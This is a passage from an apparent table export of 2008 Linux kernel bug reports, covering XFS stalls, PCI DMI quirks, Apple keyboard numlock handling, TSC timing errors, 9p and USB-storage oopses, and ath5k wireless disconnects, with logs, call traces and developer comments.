autoremove_wake_function+0x0/0x30 [ 1032.940828] [&lt;ffffffff8024caa0&gt;] worker_thread+0x0/0xd0 [ 1032.940830] [&lt;ffffffff8024caa0&gt;] worker_thread+0x0/0xd0 [ 1032.940832] [&lt;ffffffff802503ab&gt;] kthread+0x4b/0x80 [ 1032.940835] [&lt;ffffffff8020c428&gt;] child_rip+0xa/0x12 [ 1032.940837] [&lt;ffffffff802504f4&gt;] kthreadd+0x114/0x1a0 [ 1032.940839] [&lt;ffffffff80250360&gt;] kthread+0x0/0x80 [ 1032.940940] [&lt;ffffffff8020c41e&gt;] child_rip+0x0/0x12 [ 1032.940942] [ 1032.940943] INFO: lockdep is turned off. [ 1032.940953] INFO: task pdflush:27505 blocked for more than 120 seconds. [ 1032.940955] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1032.940957] pdflush D ffff81000102cdc0 0 27505 2 [ 1032.940960] ffff810065bef4c0 0000000000000046 0000000000000000 ffffffff8040ce06 [ 1032.940964] ffff81006dad5960 ffffffff8089c4a0 ffff81006dad5ca8 000000010000e9f2 [ 1032.940968] 0000000000036a20 000000008038c9f7 0000000000000003 ffffffff8038a767 [ 1032.940972] Call Trace: [ 1032.940976] [&lt;ffffffff8040ce06&gt;] __spin_lock_init+0x36/0x70 [ 1032.940979] [&lt;ffffffff8038a767&gt;] xlog_grant_push_ail+0x47/0x160 [ 1032.940982] [&lt;ffffffff806b8a29&gt;] __down_write_nested+0x79/0xc0 [ 1032.940984] [&lt;ffffffff8037f125&gt;] xfs_ilock+0xa5/0xe0 [ 1032.940987] [&lt;ffffffff8038661b&gt;] xfs_iomap_write_allocate+0x11b/0x3c0 [ 1032.940990] [&lt;ffffffff806b8ea1&gt;] _spin_lock_irqsave+0x41/0x60 [ 1032.940993] [&lt;ffffffff8038742e&gt;] xfs_iomap+0x23e/0x2d0 [ 1032.940995] [&lt;ffffffff803a2067&gt;] xfs_map_blocks+0x37/0x90 [ 1032.940997] [&lt;ffffffff803a3576&gt;] xfs_page_state_convert+0x296/0x640 [ 1032.941001] [&lt;ffffffff80253635&gt;] ktime_get_ts+0x25/0x60 [ 1032.941003] [&lt;ffffffff806b9519&gt;] _spin_unlock+0x29/0x50 [ 1032.941006] [&lt;ffffffff8025367c&gt;] ktime_get+0xc/0x50 [ 1032.941008] [&lt;ffffffff803a3a58&gt;] xfs_vm_writepage+0x68/0x110 [ 1032.941012] [&lt;ffffffff8027800e&gt;] shrink_page_list+0x52e/0x680 [ 1032.941015] [&lt;ffffffff803ec57d&gt;] blk_recount_segments+0x3d/0x80 [ 1032.941018] [&lt;ffffffff8026fc7b&gt;] mempool_alloc+0x4b/0x140 [ 1032.941020] [&lt;ffffffff80277771&gt;] isolate_lru_pages+0x1a1/0x240 [ 1032.941023] [&lt;ffffffff802782c4&gt;] shrink_inactive_list+0x164/0x450 [ 1032.941026] [&lt;ffffffff80278993&gt;] shrink_zone+0xb3/0x130 [ 1032.941028] [&lt;ffffffff8027919f&gt;] try_to_free_pages+0x24f/0x3d0 [ 1032.941031] [&lt;ffffffff80277810&gt;] isolate_pages_global+0x0/0x40 [ 1032.941034] [&lt;ffffffff802728f5&gt;] __alloc_pages_internal+0x1b5/0x460 [ 1032.941036] [&lt;ffffffff80272c35&gt;] __get_free_pages+0x15/0x60 [ 1032.941038] [&lt;ffffffff803a1b5b&gt;] kmem_alloc+0x5b/0x100 [ 1032.941041] [&lt;ffffffff8038410a&gt;] xfs_iflush_cluster+0x4a/0x3b0 [ 1032.941043] [&lt;ffffffff806b9519&gt;] _spin_unlock+0x29/0x50 [ 1032.941046] [&lt;ffffffff80383049&gt;] xfs_iflush_int+0x2d9/0x340 [ 1032.941048] [&lt;ffffffff803846e0&gt;] xfs_iflush+0x270/0x310 [ 1032.941052] [&lt;ffffffff8039bea1&gt;] xfs_inode_flush+0xb1/0xe0 [ 1032.941055] [&lt;ffffffff803ab8d5&gt;] xfs_fs_write_inode+0x25/0x70 [ 1032.941058] [&lt;ffffffff802b901f&gt;] __writeback_single_inode+0x25f/0x350 [ 1032.941061] [&lt;ffffffff806b9519&gt;] _spin_unlock+0x29/0x50 [ 1032.941064] [&lt;ffffffff803899aa&gt;] xfs_log_need_covered+0x7a/0xd0 [ 1032.941066] [&lt;ffffffff802b9577&gt;] sync_sb_inodes+0x207/0x310 [ 1032.941069] [&lt;ffffffff802b98d2&gt;] writeback_inodes+0xa2/0xf0 [ 1032.941071] [&lt;ffffffff80273df6&gt;] wb_kupdate+0xa6/0x120 [ 1032.941073] [&lt;ffffffff80274ee0&gt;] pdflush+0x0/0x1f0 [ 1032.941076] [&lt;ffffffff80274ee0&gt;] pdflush+0x0/0x1f0 [ 1032.941078] [&lt;ffffffff80275001&gt;] pdflush+0x121/0x1f0 [ 1032.941080] [&lt;ffffffff80273d50&gt;] wb_kupdate+0x0/0x120 [ 1032.941082] [&lt;ffffffff802503ab&gt;] kthread+0x4b/0x80 [ 1032.941084] [&lt;ffffffff8020c428&gt;] child_rip+0xa/0x12 [ 1032.941087] [&lt;ffffffff802504f4&gt;] kthreadd+0x114/0x1a0 [ 1032.941089] [&lt;ffffffff80250360&gt;] kthread+0x0/0x80 [ 1032.941091] [&lt;ffffffff8020c41e&gt;] child_rip+0x0/0x12 [ 1032.941092] [ 1032.941093] INFO: lockdep is turned off. After this - the system becomes unusable - I've been able for example to switch to the text console, and issue a "reboot" command - it didn't work; if I try to start SeaMonkey no long enough after the stall occurs - it works, but not for long - it stalls too if I try to something, requiring write access to the root partition; I tried "sync"-ing - it blocks, too. Steps to reproduce: not sure exactly; to me it looks like a "git pull" command is triggering the problem; of all the other programs running maybe notable is ktorrent, but it happened once even when ktorrent was not started; On the system the problem occurs there are only XFS and NTFS partitions - I used the NTFS to save some of dmesg's output, since the XFS ones were of no use See also: http://lkml.org/lkml/2008/4/30/176 - this is an email I sent to ask for help on how to debug the problem, but as I see it - all the devs are busy right now due to the merge window - hence, this bug-report</t>
  </si>
  <si>
    <t>x86 PCI dmi_check_system() quirk checks not being run</t>
  </si>
  <si>
    <t>2008-05-01 07:01 UTC</t>
  </si>
  <si>
    <t>2008-05-07 14:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Distribution: Fedora 8 Hardware Environment: Dell PowerEdge 1955 Software Environment: Fedora 8 Problem Description: DMI matching to auto-enable pci=bfsort is not working. pci=bfsort is not being enabled automatically, leading to onboard NICs being assigned names "backwards" from expectations. dmi_check_system(pciprobe_dmi_table) is not getting run anymore on x86. pci_acpi_init() ran and set pcibios_scanned++. pci_legacy_init() then ran, saw pcibios_scanned &gt; 0, and returned. If it hadn't returned, it would have called pcibios_scan_root(), which calls dmi_check_system(pciprobe_dmi_table), which is how all the DMI-based quirks are discovered and used. The solution will involve moving the dmi_check_system(pciprobe_dmi_table) call out of pci_legacy_init() and into somewhere that is executed regardless of pcibios_scanned having been run. Perhaps inside of or ahead of pci_acpi_init(). I'm not sure when this broke. Fedora 8 gold kernel 2.6.23.1-42.fc8 and and all intermediate kernels up until Fedora rawhide kernel 2.6.25-8.fc9.x86_64 also fail. Steps to Reproduce: 1. install Fedora 8 with above kernel on a system listed in pciprobe_dmi_table[] such as a Dell PowerEdge 1955. 2. boot. dmesg | grep bfsort should yield something Actual results: no results, ethernet NICs named backwards Expected results: dmesg shows bfsort getting enabled, ethernet NICs named properly. Filed in Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=444791 Comment #3 From Dave Jones (davej@redhat.com) on 2008-04-30 14:01 EST [reply] if you boot with initcall_debug, does pci_legacy_init get called ? I wonder if we changed the default PCI probing type so that we're not preferring PCI BIOS on that system any more. Comment #4 From Matt Domsch (matt_domsch@dell.com) on 2008-04-30 22:39 EST [reply] pci_legacy_init() gets called, but exits immediately. Calling initcall 0xffffffff81487af9: pci_acpi_init+0x0/0xae() PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report initcall 0xffffffff81487af9: pci_acpi_init+0x0/0xae() returned 0. initcall 0xffffffff81487af9 ran for 0 msecs: pci_acpi_init+0x0/0xae() Calling initcall 0xffffffff81487ba7: pci_legacy_init+0x0/0xf8() initcall 0xffffffff81487ba7: pci_legacy_init+0x0/0xf8() returned 0. initcall 0xffffffff81487ba7 ran for 0 msecs: pci_legacy_init+0x0/0xf8() pci_acpi_init() ran and set pcibios_scanned++. pci_legacy_init() then ran, saw pcibios_scanned &gt; 0, and returned. If it hadn't returned, it would have called pcibios_scan_root(), which calls dmi_check_system(), which is how all the DMI-based quirks are discovered and used. So we'll need to get dmi_check_system() executed regardless of if it's pci_acpi_init() or pci_legacy_init() that's really used. This may have broken before the i386/x86-64 merger, I can't tell very well.</t>
  </si>
  <si>
    <t>Apple Aluminium keyboards needs not to use the numlock emulation</t>
  </si>
  <si>
    <t>2008-05-01 08:42 UTC</t>
  </si>
  <si>
    <t>Diego 'Flameeyes' Pettenò</t>
  </si>
  <si>
    <t>2008-05-29 05:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25 Distribution: Gentoo Linux Hardware Environment: Apple Aluminium Keyboard Software Environment: N/A Problem Description: Since 2.6.25 added support for Apple Aluminium keyboards, I've enabled it, but the quirks enabled are the same as Apple laptops' keyboards, which means they have numlock software emulation. This software emulation is not useful at all for Aluminium keyboards, and actually makes them unusable once Numlock is enabled. Steps to reproduce: Enable Apple keyboard support in kernel 2.6.25, connect an Apple Aluminium keyboard and enable numlock. I'm going to attach a patch that splits out the numlock emulation quirk, so that it's only enabled if requested, and requests it for all the models beside the Aluminium (so that the previous behaviour is maintained for all of them). HTH, Diego Pettenò</t>
  </si>
  <si>
    <t>System Timer can come up bad</t>
  </si>
  <si>
    <t>2008-05-01 09:28 UTC</t>
  </si>
  <si>
    <t>Charles Mitchell</t>
  </si>
  <si>
    <t>2008-09-04 13:37 UTC</t>
  </si>
  <si>
    <t>Hardware: Intel S5000PAL/PSL motherboard, dual 5160 and dual E5450. PCIe plugin card to IDT Switch Software Environment: Problem Description: We noticed that some of our systems were coming up with bad system time, i.e. cpu_khz in /proc/cpuinfo was wrong and time was not being correctly kept(losing several seconds per minute). This problem happens more often on some machines than others. The problem is due to the fact that the number of cpu cycles over 30 ms is occassionally too large and the cpu_khz calculated in tsc.c ends up too large. I suspect that an NMI is sneaking in, delaying the time at which the OUT pin is sampled high (inb_p(0x61) &amp; 0x20). The 2.6.25 code is the same as 2.6.18 for the sampling of the OUT pin. Test results: kernel result ============ ================= 2.6.18.solace Fails approx 1 in 3 reboots 2.6.18.8 Failed after 16 reboots 2.6.25 2 fails in 244 reboots The interesting thing is that 2.6.25 had an extremely rare "cpu looks slow" event. Normally the cpu looks too fast because cpu_cycles are recorded while the cpu is distracted with an NMI. In the too slow case - the only way this can happen is if the NMI happens at a very specific time - in between programming the timer and reading the 'start' cycle count. So in this case we know extactly how long the NMI was - it was 5.84 ms. We plan on fixing by repeating the measurement some number of times and selecting the best results. bogomips are also independently calculated incorrectly - this is a separate problem that I believe is of little consequence. Steps to reproduce: reboot and look at /proc.cpuinfo for incorrect CPU MHz.</t>
  </si>
  <si>
    <t>[net/wireless/wavelan.c:913]: Array index out of bounds</t>
  </si>
  <si>
    <t>2008-05-01 23:30 UTC</t>
  </si>
  <si>
    <t>Daniel Marjamäki</t>
  </si>
  <si>
    <t>2008-05-14 13:52 UTC</t>
  </si>
  <si>
    <t>Array index is out of bounds for p-&gt;psa_reserved[2] and p-&gt;psa_reserved[3]. The psa_reserved array only has 2 elements.</t>
  </si>
  <si>
    <t>rndis_host fails to register HTC P3600 device</t>
  </si>
  <si>
    <t>2008-05-02 06:56 UTC</t>
  </si>
  <si>
    <t>2008-08-12 01:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ??? Earliest failing kernel version: ???, but fails with 2.6.24 too Distribution: Debian unstable Hardware Environment: AMD64 Sempron on a VIA board, HTC P3600 "phone" with Samsung SC32442B processor Software Environment: SynCE 0.11 (host), Microsoft® Windows Mobile® 5.0 (phone) Problem Description: When I connect my hype phone thingy to my computer, the rdnis_host driver is loaded, but registration of the device fails, with the following logs: [17069.106611] usb 2-1: new full speed USB device using uhci_hcd and address 7 [17069.228636] usb 2-1: configuration #1 chosen from 1 choice [17069.232878] usb 2-1: New USB device found, idVendor=0bb4, idProduct=0b05 [17069.232884] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [17069.232887] usb 2-1: Product: Generic RNDIS [17069.232890] usb 2-1: Manufacturer: HTC [17069.232892] usb 2-1: SerialNumber: ********-****-****-****-************ [17069.367902] usbcore: registered new interface driver cdc_ether [17069.446807] rndis_host 2-1:1.0: RNDIS_MSG_QUERY(0x00010202) failed, -110 [17069.511717] rndis_host 2-1:1.0: RNDIS_MSG_QUERY(0x01010101) failed, -110 [17069.511725] rndis_host 2-1:1.0: rndis get ethaddr, -110 [17069.513247] rndis_host: probe of 2-1:1.0 failed with error -110 [17069.513290] usbcore: registered new interface driver rndis_host [17069.613383] rndis_wlan 2-1:1.0: RNDIS_MSG_QUERY(0x00010202) failed, -47 [17069.614388] usbcore: registered new interface driver rndis_wlan However, the SynCE project provides an alternative patched rndis_host driver, which does work. I narrowed down the diff to the relevant bits, and when patched with those bits, the mainline kernel driver works, with the following logs: [17039.548771] usb 2-1: new full speed USB device using uhci_hcd and address 6 [17039.668976] usb 2-1: configuration #1 chosen from 1 choice [17039.672000] usb 2-1: New USB device found, idVendor=0bb4, idProduct=0b05 [17039.672006] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [17039.672009] usb 2-1: Product: Generic RNDIS [17039.672012] usb 2-1: Manufacturer: HTC [17039.672014] usb 2-1: SerialNumber: ********-****-****-****-************ [17039.808935] usbcore: registered new interface driver cdc_ether [17040.343229] rndis_host 2-1:1.0: RNDIS_MSG_QUERY(0x00010202) failed, -47 [17040.915682] eth2: register 'rndis_host' at usb-0000:00:10.0-1, RNDIS device 80:00:60:0f:e8:00 [17040.915721] usbcore: registered new interface driver rndis_host [17040.931986] usbcore: registered new interface driver rndis_wlan [17048.027188] eth2: no IPv6 routers present The "RNDIS_MSG_QUERY(0x00010202) failed, -47" didn't show up with the 2.6.24 driver. (However, 2.6.24 had a packet reception problem, fixed by some other bits of the SynCE driver, but this doesn't appear on 2.6.25 anymore). Steps to reproduce: Just turn on the device and plug it into the USB port. At least, the patch makes things work...</t>
  </si>
  <si>
    <t>9p: oops on corner case when no transport modules are loaded</t>
  </si>
  <si>
    <t>2008-05-02 14:21 UTC</t>
  </si>
  <si>
    <t>Bug reported from Ron Minnich I'm trying to get 9 mount etc. etc. working. i want to build a linux desktop that is a 'work alike' for a plan 9 desktop. So I need to mount /wsys, /9dev, etc. Either the commented or uncommented code below gets an oops: BUG: unable to handle kernel paging request at 68760118 IP: [&lt;f8c133dc&gt;] :9pnet:p9_client_destroy+0x35/0x80 *pde = 00000000 Oops: 0000 [#5] SMP Modules linked in: 9p 9pnet i915 drm cpufreq_ondemand acpi_cpufreq sbs sbshc snd_hda_intel snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss sdhci snd_mixer_oss mmc_core snd_pcm pcspkr i2c_i801 e1000e snd_timer iwl3945 video snd output battery ac soundcore snd_page_alloc button sg joydev ahci libata dock sd_mod scsi_mod ext3 jbd ehci_hcd ohci_hcd uhci_hcd [last unloaded: microcode] Pid: 5690, comm: mount Tainted: G D (2.6.25 #2) EIP: 0060:[&lt;f8c133dc&gt;] EFLAGS: 00010202 CPU: 0 EIP is at p9_client_destroy+0x35/0x80 [9pnet] EAX: 68760108 EBX: f2efa640 ECX: 00000000 EDX: 68760108 ESI: f2efa640 EDI: 00000000 EBP: ffffffa3 ESP: f1916e0c DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process mount (pid: 5690, ti=f1916000 task=f2f626a0 task.ti=f1916000) Stack: ffffffa3 f2efa640 f8c13781 f6ca7a20 f190f000 f8c20a1c f6ca7738 f2efae80 c01cc9a0 f1916e58 f6ca7738 f8c24850 00000000 00000000 f2efae80 0000000a f2efae80 f190f000 f8c20b72 00000003 00271d65 f2f64001 f755bf4c f1916f34 Call Trace: [&lt;f8c13781&gt;] p9_client_create+0x29c/0x2a6 [9pnet] [&lt;f8c20a1c&gt;] v9fs_session_init+0xc7/0x2ff [9p] [&lt;c01cc9a0&gt;] match_token+0x62/0x18a [&lt;f8c20b72&gt;] v9fs_session_init+0x21d/0x2ff [9p] [&lt;f8c1f140&gt;] v9fs_get_sb+0x80/0x1f0 [9p] [&lt;c01808ab&gt;] alloc_vfsmnt+0x86/0xac [&lt;c0170427&gt;] vfs_kern_mount+0x39/0x72 [&lt;c017049e&gt;] do_kern_mount+0x2f/0xb4 [&lt;c018176a&gt;] do_new_mount+0x55/0x89 [&lt;c018190b&gt;] do_mount+0x16d/0x18c [&lt;c017fedd&gt;] copy_mount_options+0x26/0x109 [&lt;c0181997&gt;] sys_mount+0x6d/0xa6 [&lt;c01058fe&gt;] syscall_call+0x7/0xb ======================= Code: c3 74 1f 53 64 a1 00 90 42 c0 ff b0 dc 01 00 00 68 82 61 c1 f8 68 b0 63 c1 f8 e8 9a 30 51 c7 83 c4 10 8b 53 1c 85 d2 74 14 89 d0 &lt;ff&gt; 52 10 8b 43 1c e8 0f 7e 55 c7 c7 43 1c 00 00 00 00 8b 4b 28 EIP: [&lt;f8c133dc&gt;] p9_client_destroy+0x35/0x80 [9pnet] SS:ESP 0068:f1916e0c ---[ end trace 6d9db7b540d27f19 ]--- #include &lt;stdio.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; #include &lt;sys/mount.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/un.h&gt; int main(int argc, char *argv[]) { int fd; int fd2; int ret; char command[512]; struct sockaddr_un un = {AF_UNIX}; if (argc &lt; 3) errx(1, "arg count"); fd = socket(PF_UNIX, SOCK_STREAM, 0); strncpy(un.sun_path, argv[1], sizeof(un.sun_path)); fd2 = connect(fd, (const struct sockaddr *)&amp;un, sizeof(un)); /* sprintf(command, "rfdno=%d,wfdno=%d", fd2, fd2); ret = mount("none", argv[2], "9p", 0, command); if (ret) errx(ret, "no mount"); return ret; */ sprintf(command, "mount -t 9p none %s -o rfdno=%d,wfdno=%d", argv[2], fd2, fd2 ); system(command); return 0; }</t>
  </si>
  <si>
    <t>9p: module dependencies not correctly expressed</t>
  </si>
  <si>
    <t>2008-05-02 14:24 UTC</t>
  </si>
  <si>
    <t>2010-01-28 14:58 UTC</t>
  </si>
  <si>
    <t>There are now a minimum of 3 modules necessary for normal v9fs operation, but the module dependencies aren't expressed in the modules so users either get cryptic error messages or worse. At the very least module dependencies between 9pnet_fd and 9pnet need to be expressed. It would also be desirable to increment use count of transport modules while they are being used in an active mount so that the user won't accidently remove the module while an active mount is using the interfaces.</t>
  </si>
  <si>
    <t>Huawei CDMA PCMCIA card oops</t>
  </si>
  <si>
    <t>2.6.25-current git</t>
  </si>
  <si>
    <t>2008-05-03 06:38 UTC</t>
  </si>
  <si>
    <t>2008-05-14 14:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 pure kernel. Earliest failing kernel version: 2.6.25 -latest git Distribution:Debian Testing Hardware Environment:Lenovo 3000 N100, Huawei EC500 CDMA card Software Environment: Problem Description: I get this oops with my PCMCIA CDMA card. lsusb not working. Cannot connect to internet. usb 6-1: New USB device found, idVendor=12d1, idProduct=1001 usb 6-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 6-1: Product: Huawei Mobile usb 6-1: Manufacturer: Huawei Technologies Initializing USB Mass Storage driver... BUG: unable to handle kernel NULL pointer dereference at 00000004 IP: [&lt;c025afa7&gt;] scsi_destroy_command_freelist+0x10/0x54 *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: usb_storage(+) loop firewire_sbp2 usbhid hid ohci_hcd joydev snd_hda_intel snd_hwdep snd_pcm_oss snd_pcm snd_page_alloc snd_mixer_oss arc4 firewire_ohci snd_seq_dummy firewire_core ecb crypto_blkcipher snd_seq_oss crc_itu_t pcmcia snd_seq_midi snd_rawmidi iwl3945 snd_seq_midi_event mac80211 led_class snd_seq snd_timer snd_seq_device ohci1394 thermal snd sdhci battery psmouse ieee1394 cfg80211 ac button processor mmc_core yenta_socket rsrc_nonstatic pcmcia_core intel_agp evdev ehci_hcd uhci_hcd i2c_i801 soundcore usbcore 8139cp 8139too i2c_core Pid: 1713, comm: modprobe Not tainted (2.6.25 #7) EIP: 0060:[&lt;c025afa7&gt;] EFLAGS: 00010217 CPU: 0 EIP is at scsi_destroy_command_freelist+0x10/0x54 EAX: f72ff000 EBX: 00000000 ECX: c17fd1cc EDX: fffffffc ESI: f72ff000 EDI: f72ff018 EBP: f72bfd10 ESP: f72bfd04 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process modprobe (pid: 1713, ti=f72be000 task=f7516070 task.ti=f72be000) Stack: f72ff000 00000000 00000000 f72bfd20 c025b85e f72ff160 c040cdec f72bfd28 c02541de f72bfd3c c01e197c f72ff164 c01e193c f72ff34c f72bfd4c c01e23f9 f72ff160 fffffffb f72bfd58 c01e18bb f72ff34c f72bfd60 c0253de1 f72bfd68 Call Trace: [&lt;c025b85e&gt;] ? scsi_host_dev_release+0x6b/0x98 [&lt;c02541de&gt;] ? device_release+0x37/0x5c [&lt;c01e197c&gt;] ? kobject_release+0x40/0x50 [&lt;c01e193c&gt;] ? kobject_release+0x0/0x50 [&lt;c01e23f9&gt;] ? kref_put+0x39/0x44 [&lt;c01e18bb&gt;] ? kobject_put+0x3c/0x41 [&lt;c0253de1&gt;] ? put_device+0xf/0x11 [&lt;c025b7c2&gt;] ? scsi_host_put+0xd/0xf [&lt;f8b23585&gt;] ? release_everything+0xaa/0xaf [usb_storage] [&lt;f8b23df5&gt;] ? storage_probe+0x509/0x5cc [usb_storage] [&lt;f88840c2&gt;] ? usb_autopm_do_device+0xb1/0xb9 [usbcore] [&lt;f8884b22&gt;] ? usb_probe_interface+0xc0/0xee [usbcore] [&lt;c0256007&gt;] ? driver_probe_device+0xa0/0x11b [&lt;c02560bc&gt;] ? __driver_attach+0x3a/0x59 [&lt;c025592a&gt;] ? bus_for_each_dev+0x3b/0x5d [&lt;c0255eac&gt;] ? driver_attach+0x14/0x16 [&lt;c0256082&gt;] ? __driver_attach+0x0/0x59 [&lt;c0255cac&gt;] ? bus_add_driver+0x97/0x1a7 [&lt;c02562c3&gt;] ? driver_register+0x71/0xcd [&lt;f8884757&gt;] ? usb_register_driver+0x66/0xc0 [usbcore] [&lt;f8847022&gt;] ? usb_stor_init+0x22/0x3b [usb_storage] [&lt;c013f3f9&gt;] ? sys_init_module+0x17c3/0x1968 [&lt;c014a0f4&gt;] ? find_lock_page+0x29/0x76 [&lt;c0103871&gt;] ? sysenter_past_esp+0x6a/0x91 ======================= Code: e8 d3 72 f0 ff 8b 46 04 e8 cb 72 f0 ff b8 a4 d4 40 c0 e8 89 78 0a 00 5b 5e 5d c3 55 89 e5 57 56 89 c6 53 8d 78 18 eb 1c 8d 53 fc &lt;8b&gt; 42 08 8b 4a 04 89 41 04 89 08 89 5a 08 89 5a 04 8b 46 10 e8 EIP: [&lt;c025afa7&gt;] scsi_destroy_command_freelist+0x10/0x54 SS:ESP 0068:f72bfd04 ---[ end trace ec8749a2ebb6e124 ]--- Steps to reproduce: Insert pcmcia card into cardbus slot or boot with PCMCIA card inserted.</t>
  </si>
  <si>
    <t>ath5k driver disconnects sporadic with WPA-PSK and does not reconnect again</t>
  </si>
  <si>
    <t>2.6.25, 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-05 15:29 UTC</t>
  </si>
  <si>
    <t>2009-07-25 12:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.25 (first kernel which included ath5k) Distribution: Fedora 7 Hardware Environment: HP NC6000 Laptop w/ built-in ath5k Problem Description: Laptop with built-in AR5212 network card: 02:04.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) Subsystem: Compaq Computer Corporation Unknown device 00e5 Flags: medium devsel, IRQ 11 Memory at 90080000 (32-bit, non-prefetchable) [size=64K] Capabilities: [44] Power Management version 2 ath5k driver connects to my WPA-PSK wifi router, but after some time (and after adding some more wifi load), the ath5k driver just disconnects again and fails to reconnect. Only "rmmod ath5k" and "modprobe ath5k" brings it back again. System log reports: ACPI: PCI Interrupt 0000:02:04.0[A] -&gt; Link [C0C6] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ath5k_pci 0000:02:04.0: registered as 'phy0' phy0: Selected rate control algorithm 'pid' ath5k phy0: Atheros AR5213 chip found (MAC: 0x56, PHY: 0x41) ath5k phy0: RF5111 5GHz radio found (0x17) ath5k phy0: RF2111 2GHz radio found (0x23) udev: renamed network interface wlan0 to wlan1 wlan1: Initial auth_alg=0 wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x471 status=0 aid=1) wlan1: associated wlan1: switched to short barker preamble (BSSID=00:50:18:3b:2b:04) wlan1: invalid Michael MIC in data frame from 00:15:0c:e1:c0:96 wlan1: invalid Michael MIC in data frame from 00:15:0c:e1:c0:96 wlan1: RX disassociation from 00:50:18:3b:2b:04 (reason=1) wlan1: disassociated wlan1: RX disassociation from 00:50:18:3b:2b:04 (reason=7) wlan1: RX disassociation from 00:50:18:3b:2b:04 (reason=7) wlan1: RX disassociation from 00:50:18:3b:2b:04 (reason=7) wlan1: RX disassociation from 00:50:18:3b:2b:04 (reason=7) wlan1: deauthenticate(reason=14) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX deauthentication from 00:50:18:3b:2b:04 (reason=9) wlan1: deauthenticated wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: association with AP 00:50:18:3b:2b:04 timed out wlan1: Initial auth_alg=0 wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: association with AP 00:50:18:3b:2b:04 timed out wlan1: Initial auth_alg=0 wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: association with AP 00:50:18:3b:2b:04 timed out wlan1: Initial auth_alg=0 wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x451 status=1 aid=1) wlan1: AP denied association (code=1) wlan1: association with AP 00:50:18:3b:2b:04 timed out wlan1: Initial auth_alg=0 wlan1: authenticate with AP 00:50:18:3b:2b:04 wlan1: RX authentication from 00:50:18:3b:2b:04 (alg=0 transaction=2 status=0) wlan1: authenticated wlan1: associate with AP 00:50:18:3b:2b:04 wlan1: RX AssocResp from 00:50:18:3b:2b:04 (capab=0x471 status=0 aid=1) wlan1: associated wlan1: switched to short barker preamble (BSSID=00:50:18:3b:2b:04) A prism54-based cardbus card with the p54 driver connects on the same laptop and wifi configuration without problems and stays connected for hours. Steps to reproduce: - modprobe ath5k - Tell KNetworkmanager to use ath5k-based driver.</t>
  </si>
  <si>
